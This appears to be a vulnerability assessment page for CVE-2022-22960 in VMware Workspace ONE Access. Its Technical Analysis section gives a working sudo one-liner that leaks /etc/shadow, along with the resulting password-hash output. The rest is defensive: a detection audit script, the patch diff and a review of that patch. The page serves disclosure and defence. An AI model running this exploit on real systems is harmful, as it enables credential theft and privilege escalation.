CVE-2022-22960
Description
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to ‘root’.
Ratings
Attacker Value: Low
Exploitability: Very High
Technical Analysis
There is a vulnerability in /usr/local/horizon/scripts/publishCaCert.hzn that lets a local attacker make any file on the system world-readable. The script exists to support certificate management: it copies a certificate file into /etc/ssl/certs, a directory owned by root, and the horizon user is permitted to run it through sudo without a password.

The script takes two arguments: the path of the file to copy, and the name to write it under in the destination directory. The source path is not validated, so it can be any file the root-run script can read; the destination argument is reduced to its final path component, so the copy always lands in /etc/ssl/certs.

A local user running as horizon (for example after successfully exploiting CVE-2022-22954) can recover the shadow file by executing:

    horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow
    root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::
    bin:x:18964:0:60:7:::
    daemon:x:18964:0:60:7:::
    messagebus:x:18964:0:60:7:::
    systemd-bus-proxy:x:18964:0:60:7:::
    systemd-journal-gateway:x:18964:0:60:7:::
    systemd-journal-remote:x:18964:0:60:7:::
    systemd-journal-upload:x:18964:0:60:7:::
    systemd-network:x:18964:0:60:7:::
    systemd-resolve:x:18964:0:60:7:::
    systemd-timesync:x:18964:0:60:7:::
    nobody:x:18964:0:60:7:::
    sshd:!:18964:0:60:7:::
    rabbitmq:!:18964::60::::
    named:!:18964::60::::
    postgres:!:18964:0:60:7:::
    horizon:!:18964:0:60:7:::
    sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::
    elasticsearch:!:18964::60::::
Detection
The file written into /etc/ssl/certs is owned by root, so the attacker cannot delete it afterwards. A careful attacker would instead back up an existing certificate file (or create a new one), leak the file of their choosing under that name, and then overwrite it with a legitimate certificate to remove the evidence. Defenders should look for files out of place in this directory, and inspect modification timestamps and file contents (anything that does not parse as a certificate, or a certificate rewritten when no certificate change was expected) to identify exploitation attempts of this vulnerability.
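The check described above, written out as a small audit script. This is an added example, not code from the original assessment or from VMware. It walks a certificate directory and flags two things: any file that is not made up purely of PEM CERTIFICATE blocks (a copied /etc/shadow, or a bundle whose first block is a certificate but which also carries a private key), parsing the survivors with openssl x509 when openssl is on PATH; and any valid certificate modified after a known-good baseline marker, which is how the overwrite-with-a-legitimate-certificate cleanup would show up. The directory layout, the .baseline marker, the CERT_PARSE switch and the sample files are constructed for the example.

```shell
#!/bin/sh
# Audit a certificate directory for files that should not be there.
# Added example for CVE-2022-22960, not code from the original assessment or
# from VMware. Point audit_cert_dir at /etc/ssl/certs on a real host; the
# fixture at the bottom builds a constructed directory so it runs stand-alone.

# CERT_PARSE=1 additionally parses every structurally valid file with
# `openssl x509`; it defaults to 1 when openssl is on PATH. Set it to 0 on
# hosts without a working openssl (the structural check still runs).
: "${CERT_PARSE:=$(command -v openssl >/dev/null 2>&1 && echo 1 || echo 0)}"

# Structural check: a certificate file may contain only PEM CERTIFICATE
# blocks (BEGIN/END markers with base64 lines between them) and blank lines.
# A shadow copy fails on its first line; a cert+key bundle fails at the
# PRIVATE KEY block; an empty file has no blocks and fails too.
pem_cert_only() {
    awk '
        /^-----BEGIN CERTIFICATE-----$/ { if (inblock) bad = 1; inblock = 1; blocks++; next }
        /^-----END CERTIFICATE-----$/   { if (!inblock) bad = 1; inblock = 0; next }
        inblock && $0 ~ "^[A-Za-z0-9+/=]+$" { next }
        !inblock && /^[[:space:]]*$/    { next }
        { bad = 1 }
        END { if (bad || inblock || blocks == 0) exit 1; exit 0 }
    ' "$1"
}

# Returns 0 if the file is a certificate, 1 otherwise.
is_certificate() {
    pem_cert_only "$1" || return 1
    if [ "$CERT_PARSE" = 1 ]; then
        openssl x509 -noout -in "$1" >/dev/null 2>&1 || return 1
    fi
    return 0
}

# Print one finding per line ("<reason> <file name>") for every regular file
# in DIR that is not a certificate, or that is a certificate but was modified
# after the baseline marker (default DIR/.baseline, touched at the last
# known-good inventory of the directory).
audit_cert_dir() {
    dir=$1
    ref=${2:-$dir/.baseline}
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        if ! is_certificate "$f"; then
            echo "not-a-certificate $name"
        elif [ -f "$ref" ] && [ "$f" -nt "$ref" ]; then
            echo "newer-than-baseline $name"
        fi
    done
}

# Constructed fixture: a legitimate old certificate, a baseline marker, and
# three files an attacker might leave behind. Not data from a real system.
make_fixture() {
    dir=$1
    mkdir -p "$dir"
    # A real self-signed certificate when openssl can make one; otherwise a
    # marker-only placeholder, and the openssl parse step is switched off.
    if [ "$CERT_PARSE" = 1 ] && openssl req -x509 -newkey rsa:2048 -nodes \
            -keyout "$dir/.key.tmp" -out "$dir/ca-bundle.pem" \
            -subj /CN=example -days 1 >/dev/null 2>&1; then
        rm -f "$dir/.key.tmp"
    else
        CERT_PARSE=0
        printf '%s\n' '-----BEGIN CERTIFICATE-----' 'MIIBszCCAVmgAwIBAgIUAA==' \
            '-----END CERTIFICATE-----' > "$dir/ca-bundle.pem"
    fi
    touch -t 202204010000 "$dir/ca-bundle.pem"   # long-standing, legitimate
    touch -t 202204020000 "$dir/.baseline"       # last known-good inventory
    # Leaked through the sudo script: a shadow copy, and a PEM bundle whose
    # first block is a certificate but which also carries a private key.
    printf '%s\n' 'root:$6$salt$hash:19131:0:60:7:::' 'horizon:!:18964:0:60:7:::' > "$dir/shadow"
    { cat "$dir/ca-bundle.pem"
      printf '%s\n' '-----BEGIN PRIVATE KEY-----' 'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKc=' \
          '-----END PRIVATE KEY-----'; } > "$dir/combined.pem"
    # A valid certificate written after the baseline: what the cleanup step
    # described under Detection (overwrite with a legitimate cert) looks like.
    cp "$dir/ca-bundle.pem" "$dir/corp-root.pem"
}

# Stand-alone demo on the constructed directory.
demo_dir=$(mktemp -d)
make_fixture "$demo_dir"
audit_cert_dir "$demo_dir"
rm -rf "$demo_dir"
```

On a real host the baseline marker would be created (or its timestamp taken from package or configuration-management records) when the directory is last known to be clean; the structural check catches the shadow-file case on its own, while the timestamp check is what catches the case where the attacker tidied up by writing a legitimate certificate back over the leaked file.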
Remediation
VMware patched this issue with hotfix HW-154129. The patch adds a check to the affected script that the source argument parses as a certificate before it is copied.
Diff:
< . /usr/local/horizon/scripts/hzn-bin.inc < openssl x509 -noout -in $CERTFILE 2>/dev/null < < if [ $? -ne 0 ]; then < echo "ERROR: This is not a certificate file" < exit 1 < fi <
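Review bot: the added check only verifies that $CERTFILE contains a parseable X.509 certificate, not that it contains nothing else, so a PEM bundle that holds a certificate followed by a private key (or any other data after the first certificate block) still passes `openssl x509 -noout -in $CERTFILE` and is copied whole into the root-owned, readable destination; writing the parsed certificate out instead of copying the raw file, e.g. `openssl x509 -in "$CERTFILE" -out "$DEST"` (DEST standing in for whatever variable the script uses for the target path), would leave only the certificate behind. Two smaller points on the same lines: `$CERTFILE` is unquoted, so a path containing whitespace or glob characters is split before openssl sees it, and testing `$?` on a separate line is equivalent to `if ! openssl x509 -noout -in "$CERTFILE" 2>/dev/null; then`, which is harder to get wrong. Also, in `diff`'s default output `<` marks lines from the first file, so the validation here reads as the left-hand side; a unified diff (`diff -u old new`) would show the added lines with `+` and make the direction unambiguous.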
General Information
Vendors
- vmware
Products
- cloud foundation
- identity manager 3.3.3
- identity manager 3.3.4
- identity manager 3.3.5
- identity manager 3.3.6
- vrealize automation
- vrealize automation 7.6
- vrealize suite lifecycle manager
- workspace one access 20.10.0.0
- workspace one access 20.10.0.1
- workspace one access 21.08.0.0
- workspace one access 21.08.0.1